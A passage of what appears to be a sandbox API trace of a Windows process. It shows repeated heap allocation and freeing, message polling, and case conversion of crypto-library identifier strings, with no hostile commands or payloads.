(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0223.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0223.053] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0223.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0223.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0223.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0223.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0223.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0223.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0223.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0223.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0223.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0223.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0223.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0223.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0223.054] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0223.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0223.054] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0223.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0223.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0223.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51250 [0223.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0223.054] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0223.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0223.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0223.054] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0223.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0223.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0223.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51010 [0223.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0223.054] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0223.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0223.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0223.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0223.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0223.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0223.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0223.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0223.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0223.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0223.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0223.055] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0223.055] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0223.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0223.055] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0223.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0223.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0223.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51238 [0223.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0223.055] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0223.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0223.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0223.055] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0223.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0223.055] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0223.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0223.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0223.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0223.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0223.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0223.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0223.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0223.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0223.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0223.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0223.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0223.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0223.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0223.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0223.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0223.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0223.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0223.056] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0223.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0223.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0223.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51070 [0223.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0223.056] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0223.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0223.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0223.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0223.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0223.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0223.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0223.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0223.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0223.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0223.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0223.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0223.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0223.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0223.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0223.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0223.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0223.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0223.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0223.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0223.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0223.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0223.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0223.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0223.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0223.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0223.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0223.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0223.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0223.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0223.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0223.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0223.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0223.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0223.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0223.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0223.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0223.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0223.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0223.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0223.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0223.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0223.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0223.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0223.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0223.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0223.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0223.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0223.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0223.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0223.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0223.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0223.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0223.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0223.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0223.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0223.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0223.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0223.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0223.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0223.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0223.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0223.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x166f1) returned 0x2ead130 [0223.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ead130 | out: hHeap=0x970000) returned 1 [0223.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0223.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0223.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0223.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0223.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0223.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0223.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0223.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0223.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x3be0e78 [0223.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0223.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0223.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0223.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0223.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0223.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0223.062] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0223.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0223.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0223.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0223.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0223.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0223.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0223.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0223.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0223.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0223.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0223.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0223.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0223.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0223.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0223.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0223.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0223.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0223.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0223.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0223.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0223.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0223.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0223.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0223.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0223.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0223.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0223.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0223.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0223.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0223.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0223.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0223.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0223.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0223.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0223.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0223.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0223.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0223.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0223.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0223.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0223.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0223.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0223.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0223.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0223.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0223.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0223.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0223.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0223.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0223.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0223.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0223.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0223.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0223.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0223.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0223.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0223.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0223.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0223.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0223.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0223.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0223.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0223.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0223.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0223.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0223.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0223.208] RtlAllocateHeap (HeapHandle=0x970000, 